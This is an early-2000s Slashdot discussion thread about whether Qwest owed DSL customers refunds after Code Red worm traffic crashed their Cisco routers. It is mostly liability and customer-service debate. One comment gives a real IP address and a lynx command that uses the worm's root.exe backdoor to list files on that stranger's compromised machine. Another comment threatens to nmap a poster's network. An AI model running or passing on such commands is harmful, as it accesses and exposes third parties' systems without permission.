Code Red Refunds?

bubblegoose writes "In Washington state Qwest customers are asking for a refund due to losses of service during the Code Red thing. Qwest is refusing to give the refunds. Excite has a story about it here." I tend to think this is just complaining bull crap. My net connection when down too, and I don't run around demanding $5 back. I'd be more upset if I was a business and my server rooted by this. The irony is that this will probably end up just pushing subscription software.

they should give refunds

we all know it was the copper's fault.

Re:they should give refunds

I really don't believe in refunds for this sort of outage. DSL isn't exactly an expensive high-end business solution. If your company has any revenue depending on your Internet connection, why aren't these companies investing in frame-relay? It's like buying a $300 car and wondering why it isn't more reliable.

Re:they should give refunds

[Newtothis]

Well, I live in Minnesota and use Qwest's DSL service. I called customer service and got a refund for the 2 weeks my service was down. I expected a refund because I pay for a service which I couldn't use through no fault of my own. I don't run a web server, only a home PC and all of the publicity/news surrounded the Microsoft web server software difficulty. Given the advanced warning for this particular 'bug', I would have expected Qwest to provide some notice (email or otherwise) to those of us still using the old Cisco 675s. Why else would they need all that contact information? As a matter of fact, since fixing the problem, I have received 2 phone calls and 1 letter from Qwest inquiring as to whether my service had been fixed or not. A little work on the front end by Qwest would have prevented a large outcry on the back.

Refunds for what?

If anything, I would be asking a refund for the silly blocking of port 80 that AT&T Broadband instituted. I wonder how long it will take them to "remember" to remove that "feature" :)

~

Re:Refunds for what?

[NoMoreNicksLeft]

I did ask for such a refund. They not only insisted that they would not do so, but that the only reason I would need the port open was if I were actually abusing their service.

They will come right out and tell you that the port block is permanent.

Fuck them. Port 8000, and as half-assed as the monkeys are that they pass off as techs, I doubt they'll ever notice. UDP 53 is more worrisome for me personally, since this isn't a service that is exactly relocatable.

Re:Refunds for what?

I seem to remember AT&T allowing low-bandwidth, non-commercial web servers on their residential cable modems. It was not until recently that they claimed that this was not allowed.

Does anyone have a copy of the AUP that would clarify this, or know where the damn link on their support page is for it?

Re:Refunds for what?

There is a simple workaround for this since AT&T is sucking hard on this matter: get a free shell account that allows for user pages, or free space somewhere, then redirect you domain to another port (port 8080, 8000, whatever) from that site. Change your Internic registration and DNS for your domain to point www at whatever you new free space is at. Done.

F YOU AT&T. YOU SUCK.

Re:Refunds for what?

I forgot to add: then go out and get one of these and recoup the cost from them cutting service to something you are paying for.

More of the same

[jfdawes]

There are too many companies getting away with complete incompetance and expecting us to just shut up and put up. What's wrong with making them pay for their own stupidity? They waste your time and get surprised/upset when you express annoyance. I don't know about you, but my time is more valuable than that.

Re:More of the same

[paulm]

Look, it took me a long time to get my dsl set up through Qwest. I need it. If you bunch of loosers can't figure out how to turn of telnet and web on your cisco 678 then please learn some shit own your own and don't bitch at Qwest.
I know that in a rational world they would care about you as a customer, but they don't. They are a monopoly and never will. But if you make them angry then they will decide to stop dsl service altogether, because really, they barely have the ability to get it up and running at all, and if they think they are going to have problems, they will just pull it.

Thank you for your time.

Re:More of the same

[superpeach]

But it isnt their fault that there is a problem with the Cisco ADSL modem and that Microsofts web server software had the security hole in the first place. If anyone other than the virus writer(s) should be blamed then it should be Cisco and Microsoft before Qwest.

Re:More of the same

[AntiNorm]

There are too many companies getting away with complete incompetance and expecting us to just shut up and put up. What's wrong with making them pay for their own stupidity? They waste your time and get surprised/upset when you express annoyance. I don't know about you, but my time is more valuable than that.

Good point, but Qwest isn't the incompetant company here. Microsoft is. Mind you, it's not all M$'s fault -- people who run any server on any OS, but *especially* an IIS server on Windows -- should be sane enough to secure their systems.

Re:More of the same

[SlashGeek]

While I didn't have any problems from my ISP (verizon), I don't think I would have asked for a refund either. Hell, even if it was down, who is to say that it was their machine in the first place? What bothers me about the whole "CodeRed" virus is, from what I have been reading, the hole was public a month before the virus hit. A patch was available at least two weeks before the virus hit. The virus itself was made public at least a week before it took off. Why oh why did so many large ISP's not fix their machines before hand? I realize that you have to run these patches on test boxes, etc. But the risk was to large not to, and it was very public. I have a friend who still doesn't have his cable modem service back up. To me it is as stupid as standing on a train track for a week waiting for the train to come and hit you. What happened?

Re:More of the same

[bendude]

When thinking about all these new "issues" that are arrising out of our new technologies, I usually try to find parallel proceedures in existing situations to use as a guide for working out the new problems.

In this regard, I would look to a not-at-fault car accident, there are a lot of similarities.

Imagine this: a car stops. The car behind it hits it and sends it carreering into the car in front.
Now, if I'm in the middle car (the first one mentioned) the guy in the very front car, who was hit through no fault of his own, sues me. I, in turn, sue the car who hit me (who was at fault) and pass on the litigation from the front guy to the one who hit me (I was not at fault for either collision and the rear vehicle was for both.).

Now lets bring this back home, Microsoft sell a product which has faults. Qwest buys said product from Microsoft and use that as a basis for their own product. I buy the Qwest product and use it to create my own product (say, a website). One day, Microsoft's product stops working. Qwest's product as a direct result, stops working. My product then stops working because of Quest's problems.

My product cannot make me any money. I am running at a loss.

I think it would be fair for me to turn around to my supplier and ask for compensation for lost earnings (at the hands of Quest's product), or at least refuse to pay for the portion of the service that was not delivered. Quest then have that option of passing on their costs to their supplier (should they be liable).

On the other hand, I could just be being too simplistic.

Re:More of the same

[c-A-d]

Anybody who needs web access to configure their router shouldn't be programming their router. Simple as that.

the only command you needed to know to stop Code Red from toasting your DSL connection is "no ip http server".

As much as I hate to say it, the people responsible for Code Red propagating are not Microsoft (and you don't know how much I want to blame them...), but those that DIDN'T secure their webservers by applying the patch.

QWest is not responsible for the system outage, the inept system administrators are....

Re:More of the same

[gwallen3141]

The problem is that DSL customers don't have a relationship with Microsoft and Cisco. They have a relationship with Qwest. Qwest has agreed to provide them with a service and if they don't then the customers shouldn't have to pay them. The fact that the interruption occured because of a defect in their equipment is a result of poor business decisions on their end for which they are responsible.

Re:More of the same

[SnapShot]

They have a relationship with Qwest.

Which is approximately similar to saying that the 98 pound guy has a relationship with his prison cell roommate; the 400 pound sex offender named Rock. Quest customers have about equal choice in their relationship. That is what monopolies mean. If nothing else, little lawsuits against gargantuan monopolies, is the little guy's only chance for revenge.

I personally don't like lawsuits, in general, but it's the only avenue to express one's opinion in these situations.

Re:More of the same

[BLAMM!]

It's decent anology, but there's one point you forgot. The middle car (Qwest) could have protected the front car if they had been compentent drivers by keeping a foot on the brake. They didn't and apparently were catching a quick snooze at the time as well. They are as responsible for the front car's damage as the rear car. (No I don't really believe a foot on the brake can stop a car accident. Its an anology. Deal with it.)

Re:More of the same

[jpeters77]

It seems to me that this whole situation is just like any other utility that has an interupt in service. If the phone lines to my house go down due to a wind storm, I don't expect a refund. I expect that the phone company to fix it promptly, but I don't expect a refund. Any thoughts?

Re:More of the same

[v4lu3s]

Working with a DSL support group for a Texas based ISP that uses cisco 678 routers, and being a cable user at home I often see both sides of service outages. At no time during the Code Red storms did a DSL line go down, nor was service not provided. The DSL lines were up and passing traffic. The problem was that the traffic was causing buffer overflows in the Cisco CBOS on the 67x routers. DSL providers usually provide unfiltered access and they did...an ISP cannot be held responsible for mailicious activity online. They don't create the viruses and neither do they hold your hand while you are online.

Most of the time the routers in question are the property of the customer. If it is the customers equipment, then it is the customers responsibility to maintain the equipment. I think that is why ISPs prefer to give the stuff away...less need for maintenance on their end.

If the problem occurring was because the ISP had IIS servers running their DNS, DHCP and so on I can see that as being an offense worthy of a refund...but why should they be held responsible against an attack against you?

Re:More of the same

[unitron]

And the moral of your analogy is that those who deal with Microsoft and Qwest wind up getting it in the rear.

Re:More of the same

You're right. You stupidity (and your stupid reply) completely invalidate the analogy. But once when it was tuesday M$ Word didn't crash so like you all shouldn't pick on M$ IIS and QWEST man.

standing behind user agreements....

[jeffy124]

Qwest is probably standing behind some small line in the fine print of their user agreement that says "Qwest will not be held responsible for interruptions in service," meaning they will not provide refunds in the event their service is temporarily offline or has other problems.

Personally, my cable modem is sometime offline, but it's usually during the day while I'm at work hence I dont notice.

Qwest

[Frijoles]

I use Qwest for both my DSL and ISP. I thought they were very helpful during this whole Code Red thing. Qwest called and left a message on my answering machine detailing how I could fix my DSL modem and patch my computer so that I would not be infected. They also called back to see if I had received their message and if I needed any help. I've been very happy with Qwest and was surprised by their customer support.

Anyway, point is.. I think they do a great job. Keep up the good work Qwest.

Re:Qwest

[vulg4r_m0nk]

Funny, Qwest is my provider as well, and the only phone call I got was notification that my bill was overdue.

On the whole I've been very happy with Qwest also, however I would like very much to know why they gave out bad information regarding the fix for more than a week. In case you didn't know, for some time they insisted that the only thing necessary was to disable remote web access to the Cisco router. This didn't work, and I suffered periodic outages for a week after I applied their prescription. It wasn't for quite some time that they revealed that blocking port 80 on the router was the only way to stop the scans from hanging it.

As a telecommuter, my productivity was cut enormously over those two weeks. Now, if it turns out that Qwest was negligent, i.e., they knew that their original "fix" didn't work but wasted time releasing that info, then I would expect compensation. However I suspect that, as happens often in complex systems, it simply took them a while to figure out what worked and what didn't. If that's the case, then I cannot reasonably demand anything more from them.

RE: Qwest

[Boarder2]

I suppose this all depends on location and such.

I think it sucks because I was told that Qwest waited to patch their servers not thinking that this was a big problem. A company as big and powerfull (bandwidth wise) as Qwest is should be carefull with their servers, especially with things like this that could take out service for everyone.

Luckily my company was able to eventually get through to some semi-compietent people at tech support that helped us through it. Unfortunately my dads company wasn't so lucky. They had 6 hour waits just to get hung up on, and call back, wait 4 more hours just to get someone that avoided the fact that it was there.

I eventually ended up giving him the way to fix it and they were up again in a few minutes. But without experiances with Qwest we are not in a position to highly reccomend them as an ISP. Though, when they're up, they're good. But so goes the story of broadband connections, right? :)

Re:Qwest

Funny, Qwest is my provider as well, and the only phone call I got was notification that my bill was overdue.

Gee, do you think paying customers would be their priority?

Re:Qwest

[the+saltydog]

Bullshit... I was offline for at least a week (in Minnesota); no one could tell me what the hell was going on, until *after* I got back online again. (The funny thing was, I'm still using an Intel 2100 internal "modem", which wasn't supposed to be affected by the worm, but the customer support staff at Qworst have been wrong before.)
I'm done with them, anyway, since the Borg is trying to assimilate us via the MSN buyout... it's time to get cable, I guess. -The Dog

Re:Qwest

[pongo000]

I'm glad to see Qwest taking care of its customers. @Home hasn't done a damn thing to block the morons who are still propagating Code Red (my Apache box gets hammered by all versions, 99% of which are from @home IP blocks). I think asking for a refund is silly, but OTOH I think @home and other ISP's should be taking proactive measures to actively block the legions of fools who have no idea they've been rooted.

Re:Qwest

[Nathdot]

I use Microsoft Outlook for both my personal and office email. I thought they were very helpful during this whole Code Red thing. Microsoft called and left a message on my answering machine detailing how I could fix my DSL modem and patch my computer so that I would not be infected. They also called back to see if I had received their message and if I needed any help. I've been very happy with Microsoft and was surprised by their customer support.

Anyway, point is.. I think they do a great job. Keep up the good work Microsoft.
-Bill Ga^H^H^H^H^H^H^H^HNet Dude-

Re:Qwest

[Anne_Nonymous]

Don't like Qwest DSL? Quit yer bitchin' and get another DSL service provider...

Oh wait, Rhythms, Northpoint, Covad all went bankrupt because Qwest wouldn't give them access in the CO's. There are no other DSL service providers. Too bad, you lose, we all lose, game over.

Re:Qwest

[papa248]

You'll have to do what I did: block all of the 24.* class-A, or if its on your subnet alone, all of the Class-C. I love IPCHAINS. It's a miracle what it can do. Besides blocking most of @Home, I've also blocked all of .jp, since the whole country is trying to sell me toner. (I have an inkjet)

Re:Qwest

[Anne_Nonymous]

Stuff Qwest Did Right:

*Eventually solved the problem
*Eventually emailed and called subscribers (or at least me)
*It's not really their fault that CodeRed was created
*It's not really their fault that MS's software is buggy
*If you do have to talk to a service rep at Qwest usually they're very nice and friendly people

Stuff Qwest Screwed Up:

*Didn't recognize that they had a problem for a few days after the rest of the world knew about it
*Called their problem RedCode instead of CodeRed
*Provided the wrong fix for the better part of a week
*The online instructions of the incorrect fix were formatted to print incompletely on three different brands of browser
*Hold times on their help line were as long as 110 minutes at one point
*If you do have to talk to a service rep at Qwest usually they're completely clueless

I'm sure there are other entries for both sides of this list that I'm not thinking of.

Re:Qwest

[MadAhab]

Just brings up an unpleasant point, which has always been true (since the dawn of dial-up, at least), and always will be; if you really depend on it, have more than one way to connect to the Internet. Sure, it might suck to pay for dial-up on top of paying for DSL (and if you do, make sure to get them from different providers), but in a pinch, it might help you find out why your shitbox minirouter doesn't work.

Re:Qwest

[dillon_rinker]

Yeah, well, I think Windows XP is a great OS because I've never seen it crash. And I've never broken a bone. And I don't know any homeless people. So I think Microsoft, Dr. Harris, and George Bush are really good at their jobs.

Anecdotal evidence is COMPLETELY irrelevant when you're discussing issues that address thousands or millions. UNLESS, of course, you have anecdotal evidence from every member of the studied population...

Re:Qwest

[SnapShot]

Earthlink has been advertising that you get X number of hours of dial-up included in your monthly DSL bill. Unfortunately, I'm too far from the magical DSL box to be able to get it so I'm stuck with dial-up anyway.

Re:Qwest

That's a damn sight better than Earthlink.

This fucker: 207.30.159.129

...has not only been hitting me with Code Red attempts about every 1.5 hours for a week now, but he's even been OWNED the whole time, with somebody placing a file called "thanks for the credit card numbers" in his Quickbooks directory, and Earthlink won't do fuck-all about it.

Check him out:

lynx -source http://207.30.159.129/scripts/root.exe?/c+dir+\\qu ickbooks

(Maybe this will get them to do something about it.)

Re:Qwest

[LinuxHeadMN]

Basically, it isn't their fault...it's the lusers fault for not keeping up on software patches and disabling the web interface. As much as I HATE Qwest, I agree with them wholeheartedly on this. They shouldn't be responsible for other peoples stupidity...

Re:Qwest

[LinuxHeadMN]

Actually, when I talked to Qwest that day, they knew of a problem but they didn't know of a fix until I told the idjits to disable the web interface and upgrade the IOS as that was the fix I designed for where I work at (major ISP in MN)...I still don't think Qwest should pay though for other people's stupidity...

Re:Qwest

[kootch]

No... Rhythms, Northpoint, and Covad all went bankrupt because the bells, ie Verizon et all wouldn't give them access in a timely manner AND priced them out of the game.

Re: Qwest

"A company as big and powerfull (bandwidth wise) as Qwest is should be carefull with their servers, especially with things like this that could take out service for everyone."

Problem is, a patch to IIS could easily bring about that denial of service to everyone; that's why NT admins don't just apply patches straight away, they wait to watch someone else take the first bullet.

If the MS patch system were more reliable and caused fewer unwanted side effects, folks would patch more confidently and quickly.

Re:Qwest

[circuskid]

Are you kidding? This has to be a joke. Qwest actually called you and offered help? I don't believe it. I've had Qwest DSL since the first month they offered and I havn't ever gotten good service from them. The only thing that keeps me with them is the quality of the connection (as in, I'm rarely down).

Oh ya, and the fix that they told you about for Code Red really isn't a "fix", but more of a work around. The real fix is to update to 2.4.1 of CBOS. But wait! Qwest doesn't support that version. Ya, thats customer service.

Re:Qwest

Wow...you're a fuckin rocket scientist because you can disable the webserver in the IOS? Kudos to you LinuxHeadMN, you're just too smart. I disagree with the comment about refunding service to customers. They should pay. They should pay for setting all their customers up with those piece of shit 678's. Please respond with your ISP so I can NMAP your block. I'm sure its a gaping security hole, seeing how you're a total "LinuxHead".

Re:Qwest

Disabling the webserver isnt enough. Common sense would dictate that when you disable the web interface (server:80) that the daemon would shut down and the port would close. But no, those assholes at Cisco who wrote that shitty IOS (same for the ISDN routers) decided to keep the daemon running regardless of the server's state. So then you have remap the port that service runs on and change the IP to 10.0.0.1 (unroutable). Am I the only one here who thinks this is fucking retarded?

Re:Qwest

[Koatdus]

I worked from home for my last job. As a backup to my DSL line I had dialup accounts set up an ready to go on two different "free" internet sevices. (one had an ad-ware client that I had to run and one didn't. I still haven't figured out how the one with no ads planned to make any money) When the dsl went down I just dialed into one or the other and was able to work at reduced speed.

For my current job we have a frame to corp. headquorters and then go out to the internet from there. Since the main office has multiple T1's the internet connection is more reliable then DSL but I still have an ad-ware connection set up and ready to click on. Last week one of the Cisco routers had a melt down and I was suddenly the most popular guy in the office.

why not?

[jchristopher]

Complaining? And why not? They are in business supplying a service - you trade your money for that service.

I cheerfully pay my ISP every month, because they provide me with a reliable, stable, fast DSL line. If it wasn't that way, I'd be in line clamoring for a refund too.

The computer industry is way too lax on quality of service - every program, OS, or hardware device has a disclaimer that they aren't responsible if it doesn't work. What am I paying for then?!?

Re:why not?

[stevew]

I agree - I've had a two week outage from @home partially due to the fact they couldn't get a service person out here quickly. They gave me a month off my bill which is ONLY reasonable! I was without the service for half a month, what they did was "the right thing."

Re:why not?

[Trebuchet]

And that outtage was because of something they were directly respnosible for, right? Did qwest write the worm? Dont think so. So why is it their fault that some people got infected?

Re:why not?

[mashy]

The computer industry is way too lax on quality of service - every program, OS, or hardware device has a disclaimer that they aren't responsible if it doesn't work. What am I paying for then?!?

Sue them!
Claim they're violating the GPL!

Comment removed

[account_deleted]

Comment removed based on user account deletion

Qwest Business DSL

The problem is Qwest business subscribers were garenteed 99.9% uptime. If slashdot or some other business was run off an ISP and they went down taking your site/business with them you would want a refund to. Unless you like vendors not following their contracts to your detriment.

Re:Qwest Business DSL

Yes this was about business users, you should have quoted though....From the article.

Business customers say the outages cost them thousands of dollars in sales. Many also complained that they had to wait up to two hours to talk to technicians, some of whom were poorly trained.

"We are solely dependent on Qwest DSL for our Internet connection, and if it goes down, we don't have a business," said Doug Colbeck, president of the outdoor recreation site Trails.com, who filed a complaint with the attorney general's consumer protection division. "We lost $5,000 worth of business. I believe Qwest owes every DSL customer a refund for the time."

Not quite...

[quartz]

While demanding a refund may seem a little off, I'd have to admit that if I was a subscriber to a program such as this one, offered by my provider, and got "protected" by having my port 80 shut off, I'd be asking for a refund too.

Re:Not quite...

yes, the fact that I don't own a TV set *does* make me a better person.

Yeah, why watch PBS when you can get your news from slashdot...

:)

You can actually do this!!! Ohhhh Charter is going down!

Nuts to you...

[Mister+Black]

I tend to think this is just complaining bull crap. My net connection when down too, and I don't run around demanding $5 back.

Maybe you should. TimeWarner Austin (part of the evil AOL Empire) will give credits for service problems with RoadRunner. All I have to do is call up whenever there is a problem (outages, etc.) and they credit me for the inconvenience.

Mister Black

complete package?

[cotcomsol]

Did the customers own the equipment that failed, or did they get it as part of the package? Every DSL service I've seen you get the hardware with the package. If this is the case, then if Qwest's hardware won't let you access the service you are paying the for, why shouldn't you expect a refund?? Now, if on the other hand, you buy your own DSL modem and you pick a lousy one that is prone to failue, then it is by no means your ISPs fault if it goes down.

I look at it like my cell phone service: if the phone that I own breaks, it is my responsibility to get it fixed. If my providers towers all go down and I can't get service for a month, I wouldn't expect to have to pay!

Re:complete package?

A common modem used by Qwest is the Cisco 675 & 678 which has web based management that can be enabled.
Qwest claims here that all you have to do is disable this feature and the router will be fine. This is not true. Even with CBOS 2.4.2 with the webadmin disabled, the incoming code red packet can still crash the 67X. Their solution? Power cycle it. Not a good solution for business where its all locked in a closet 250 miles away. I guess having the 678 hang hourly for the last 3 weeks is acceptable. um, not. And the 5 bucks, gee thanks.

Re:complete package?

[Chutzpah]

What's a business that is spread over 250 miles doing using a cable modem connection? you should have a connection that is more reliable like a T1

Re:complete package?

My parents use Qwest DSL and were basically off
the net for over a month because of the code red
worm. The cisco 675 dsl router sold to them by
qwest was susceptible to the probe packets sent
by code red (it wasn't compromised, just nuked).
Reboot the router, wait an hour or so for the
next probe and you're off the net again. Made
for a really painful experience for them, myself
and a very unfortunate (and patient) friend of
mine who spent most of several weeks trying to
get qwest to admit there's a problem and to fix
it (since they did not provide my parents with
the tools necessary to upgrade the OS on the
router [the management cable and the firmware], I
consider it entirely their problem). Fortunately,
so did qwest (eventually they gave my parents a
refund on 1.5 months of service).

Re:Did I miss something?

[jeffy124]

the side effects some cisco routers became vulnerable to were (IIRC) the large packets being sent by code red to possible IIS servers, plus some routers simply couldn't handle the amount of extra traffic code red creates, especially as more machines behind a router become infected. Much like the slashdot effect - sometimes it isn't the server that is to blame, it's the connection the server has to the internet from routers, firewalls, etc.

hmmm

[Beowulf_Boy]

While were talking about refunds, lets all get refunds from Microsoft because there crappy software has bugs and was affected by something as simple as the code red bug.
Oh, I'm sorry, when we all sold our souls to microsoft when we signed the user agreement I bet that was covered.

Re:hmmm

Ahh yes. And Linux worms are anything but simple, just like everything else in the damned OS.

Re:hmmm

[wolf-]

I want a refund of my time dealing with crappy slashcode problems here in the last few weeks.

It is SO reasonable that Taco and his crew come out and clean up sticks n leaves in my backyard to make up for the inconvenience I'v experienced.

Re:hmmm

[ethereal]

I hereby refund you all of the money you've ever paid for /. The check is in the mail!

passing the blame

[4n0nym0u53+C0w4rd]

Assuming that Qwest never guarantees a certain level of service, then these guys don't have a leg to stand on.

Of course, the responsible thing to do would be any or all of the following

• identify infected computers and notify account holders
• kick infected computers offline
• filter outgoing packets from infected machines (?)

Re:passing the blame

[budgenator]

Now that so many viri and worms are time-delayed,
when I recieve one I Email the sender and the admin at his ISP to warn them.

• should we expect six-pack joe who needs a cdrom to setup his ISP account to know about this stuff or should we expect the "experts" who made the easy-to-use cdrom to know?
• If the admin knows and the user knows, then I've done all I could.
• Shouldn't the manufacter test there routers-bridges-modems for problems?
• Shouldn't the ISP test their supplied hardware for suitablility for the supplied purpose?

I think this is an example of multi-tasking i.e. doing 80% of the task in 20% of the time, it leads the ISP and manufactures into mediocrity. Often because the program specs said a message is x sized the developer assumes that the programmer writing the sendind module tests the size and vica versa, the result is the numerous buffer-overflow exploits we hear about over and over.

The internet is increasingly a shared resource, We should demand that ISP work with users to protect this resource. We need to demand the software and hardware manufactures, actualy test their products. If a product is not presented as suitable for any particular purpose, why buy it?

Whose problem?

[alewando]

Quoth Qwest:

The problem is not the modem, the problem is the virus. Qwest is not crediting for the virus.

What Qwest clearly fails to comprehend is that, by choosing the tools they did, which have a known history of virus vulnerability, they are responsible for the reprocussions.

It's a well-settled legal principle that persons are held responsible for the actions of their agents when those agents act in the furtherance of their employers' wishes and in a manner not contradictory to responsible behavior.

Microsoft and Cisco perhaps should be held independently responsible for their failings here, but it certainly does not follow that Qwest ought be absolved of all duty to its customers.

The rationale behind such a legal relationship is readily apparent. The customers have their dealings with Qwest.

The customers often are not provided the opportunity to inquire into the methods Qwest is using to provide customers with services.

And even when they are, there is no reasonable expectation that these subcontractors will listen to these end customers. (After all, their customers aren't Qwest's customers. Their customer is Qwest alone.)

But Qwest has no real reason to complain to Microsoft and Cisco, since Qwest can simply pass the costs on to their consumers as they're trying to do here.

In the end, consumers are shafted, and everyone else profits.

Only by extending legal reliability up the foodchain to people making the final decision can we attempt to ensure that moronic decisions like these accurately produce the reprocussions for decision-makers that consumers feel.

Re:Whose problem?

[Rhyas]

What Qwest clearly fails to comprehend is that, by choosing the tools they did, which have a known history of virus vulnerability, they are responsible for the reprocussions.

Umm....Cisco has a long history of virus vulnerability? Please Explain. Because IIRC, it was a Cisco Bug that caused the Cisco router to crash/hang when Code Red hit the Management interface that Cisco has on port 80. And I was unaware of Cisco having a "known history of virus vulnerability".

-= Rhyas =-

Re:Whose problem?

[figment]

Microsoft and Cisco perhaps should be held independently responsible for their failings here, but it certainly does not follow that Qwest ought be absolved of all duty to its customers.


This problem has been known for a few months prior to the CodeRed outbreak. Cisco was fairly responsive in issuing a fix (not as fast as their normal bug fixes... but this isn't an IOS so it's somewhat understandable.)

Qwest should be somewhat held responsible because the fix had been out for a decent period of time, during which Qwest had declared the patch unsupported, leaving people who wanted to patch their routers without much of a choice but to leave it broken, and DOSable.

Re:Whose problem?

[jkgamer]

Well the problem isn't that the modem was infected by the virus. The problem is due to a bug in the Cisco 67x routers that causes them to crash when a malformed large GET is sent to the http port and the web interface is enabled on that port.

So Cisco makes the router, but Qwest distributes and requires it to use their service. Seems to me that Qwest should be liable for the downtime and it should be Qwest's responsibility to go after Cisco for the damages.

I think these companies SHOULD be reponsible for defects in their products. And that is exactly what this was. The virus didn't even target the Cisco routers, it just had the effect of killing them when it queried them for Microsoft IIS servers.

Re:Whose problem?

[aozilla]

I think these companies SHOULD be reponsible for defects in their products.

I think that adults should be permitted to enter into binding agreements.

Re:Whose problem?

[banuaba]

Because if some one shoots me, it's the firearms manufacturer's responisbility for not installing IFF transponders in the gun.

And if I get run over, it is GM's responsibility for not making thier cars out of foam rubber that won't hurt me.

Jesus fucking christ, why don't you take your head and pull it out of your ass.

Re:Whose problem?

[ethereal]

If there was real competition in the broadband market, then I would agree with you - anyone who doesn't mind Qwest's contract would be SOL when Code Red hits, and customers of other, more responsible broadband purveyors would be happy.

Unfortunately, since Qwest and the other Baby Bells have been fighting tooth and nail to nip competition in the bud, there are no real alternatives to Qwest. There's no way that the user could have prevented getting reamed in this situation - if you contract for broadband, you're stuck with Qwest's terms that leave you little recourse if their network gets hosed.

Vigorous competition is the solution to these problems, IMHO.

Re:Whose problem?

[aozilla]

Vigorous competition is the solution to these problems, IMHO.

I completely agree, unfortunately cable is a shared medium, so a solution like the phone company's line sharing agreements is impossible. You could at least force the cable companies to offer pure internet connectivity with no services to resellers at competitive prices though. Personally I'd like to see the communities buy out their local cable companies, even through local bonds if needed. There is real competition in the DSL broadband market though. The phone companies have a monopoly on the lines themselves, and on the colocation space in the COs, but this is highly regulated (and a natural monopoly). It wouldn't take too many people to create a co-op for DSL service for your local community, and you could easily expand that to a long distance and even local phone service co-op. Get enough revenues and maybe you could even start thinking about buying out your local CO. I don't know the regulations, but maybe you could even make a deal with some TV stations and offer cable TV service through the phone lines. Be sure to let me know where you do this, I'll strongly consider moving there.

Yeah, most of that is nothing more than shitty pipe dreams, but I still contend that the efforts should be spent treating the problem, not the symptoms.

Re:Whose problem?

[WNight]

Ok, let both parties spell out the limits and liabilities, in detail.

When MS lists the IIS holes in the EULA and the user signs off on them, I'll accept it as the user's fault.

But, the EULA says, in as lawyerly prose as possible, that Microsoft isn't liable for anything. Even if they intentionally bundled a virus with the OS and targetted it at you, the EULA disclaims all responsibility.

I too think that people should be able to purchase less-than-perfect products, and then be unable to sue, if it was clear what the defects were, or the extent of the sellers knowledge.

For instance, if you buy a Machine, and it's marked "As Is", you're entitled to take it back for a full refund if you find that that the seller knew it didn't work. You see, "As Is" means "I don't know" not "I tested it and it failed". It's perfectly reasonable to sell something broken, even something you believe will never work again, as long as you make its condition clear when you sell it.

Microsoft *knows* its products are shit. If they don't take immediate steps to correct this, along with notifying potential customers, imho they're liable for the damages. Hell, there's a ton of companies who are skilled in fixing security bugs. Counterpane does security audits, both network and code. They could even bring in Theo from OpenBSD; whatever else it true about Theo, he's smart enough to know which C and C++ functions risk overwriting a buffer.

Because Microsoft makes NONE of these attempts to fix their products, in my eyes, they are liable for the damages caused.

Re:Whose problem?

[aozilla]

But, the EULA says, in as lawyerly prose as possible, that Microsoft isn't liable for anything. Even if they intentionally bundled a virus with the OS and targetted it at you, the EULA disclaims all responsibility.

Well, first of all, I wasn't talking about Microsoft. I was talking about the DSL provider.

Secondly, if Microsoft intentionally bundled a virus and targetted you, you would still be protected under the law. You can't sign away your rights to that. That the EULA would even allow such a thing is merely a symptom of the fact that such laws exist, though. I don't agree with those laws. They make it too difficult to know what you're getting into when you sign something, and make it too easy for companies to have contracts which amount to "any right you can possibly sign away, you hereby sign away".

Thirdly, an EULA is not a contract, and should not be binding in a court of law. That it is is a major major problem with our current legal system.

Fourthly, everyone knows their products are shit for some definition of shit. If Microsoft knows about specific bugs and does not notify the customer of them, that's fraud, and has nothing to do with allowing adults to enter into binding contracts (unless that contract specifically says that you allow microsoft to fraudulently represent their products).

Fifth, Microsoft has a monopoly, and as such must be subject to different rules and government regulations. This is arguably the true problem, and it is one specifically and intentionally set up by the government, through copyright law.

Re:Whose problem?

[WNight]

Actually, it appears we don't disagree.

1) Oops, my bad.

2) I know the law would protect you, I was saying that if MS had their way and the EULA was a contract, that you wouldn't be protected. Hypothetical.

3) Yeah, I know. They fail most of the prerequisites for a valid contract.

4) There's a difference between 'no the best' and 'shit'. MS fraudulently sells the product as enterprise ready for servers yet knows they are not capable, yet alone less capable than the free stuff.

5) Yes, monopolies should get different treatment than other companies. The spirit of capitalism is companies competing to bring you a product, not someone lying, cheating, and stealing to drive everyone else out of business, leaving the consumers with no choice.

I have a better idea...

[The_Messenger]

Isn't the downtime really the fault of the morons running unpatched IIS servers on DSL service? And who are, in the case of residential service, probably violating their service agreement? Qwest should give everyone the money, and recoup their losses by port-scanning their DSL subscribers and charging offenders an extra monthly fee. Every Qwest customer, redidential and business, who is running unpatched IIS is to blame.

Or if Qwest doesn't wish to offend their customers, they should just blame Microsoft. I understand that this is standard practice... just yesterday, some Delphi fucktard (you know the type... "just drag and drop the components! yes, that all it takes to be a real programmer!" ha ha ha) was telling me that the ability to blame Microsoft -- even for things that aren't really Redmond's fault -- is an advantage of running NT! It's really getting difficult for me to defend Windows as a rightful player in the heterogenous world of computing when its users display such poor judgement and reasoning.

Re:I have a better idea...

[AmigaAvenger]

Read the article... The outage doesn't have anyting to do with IIS. I have qwest dsl also, and was affected. Code red requests overran some buffers in the Cisco 675 dsl router/modem. Disabling web management on the modem doesn't work, you have to move it to a different port

Re:I have a better idea...

[jbrelie]

IIS and Cisco's DSL problem have nothing to do with each other except that they are both affected by Code Red. You only need one or the other to get hit. IIS servers are the worst player, since the propagate the virus at an incredible rate. Pre CBOS 2.4 Cisco Routers get nailed by the way the virus tries to infect other machines.
Also, I happen to be a resedential Qwest DSL customer as well, and I made DAMN sure there was nothing in the language of the contract that restricted me from running a webserver, mailserver, or any other server I might get a hankerin' for. So no, you can't charge people for abusing thier lines.

Re:I have a better idea...

[The_Messenger]

Are you saying that there's more to Slashdot than trying to first post?

excite article

[enrico_suave]

Is there some irony there? like when MSNBC.com reports on the latest M$ security hole/virus/etc ???

E.

Why shouldn't they get refunds?

[Wakko+Warner]

It depends on what they were guaranteed, doesn't it? If the contract they signed stipulated an always-available Internet connection, and it wasn't always available (due to whatever circumstances), shouldn't a refund be in order?

When a telephone pole near my house was struck by lightning last year, I lost cable (and cable modem Internet access) for a couple of weeks. The cable company not only happily refunded me half a month's worth of charges, but I didn't even have to ask.

- A.P.

Re:Why shouldn't they get refunds?

[chryptic]

Qwest never promises anything.

Re:Why shouldn't they get refunds?

When a telephone pole near my house was struck by lightning last year, I lost cable (and cable modem Internet access) for a couple of weeks. The cable company not only happily refunded me half a month's worth of charges, but I didn't even have to ask.

The problem here is that in this case too many people are affected to make these refunds reasonable.

Re:Did I miss something?

[vulg4r_m0nk]

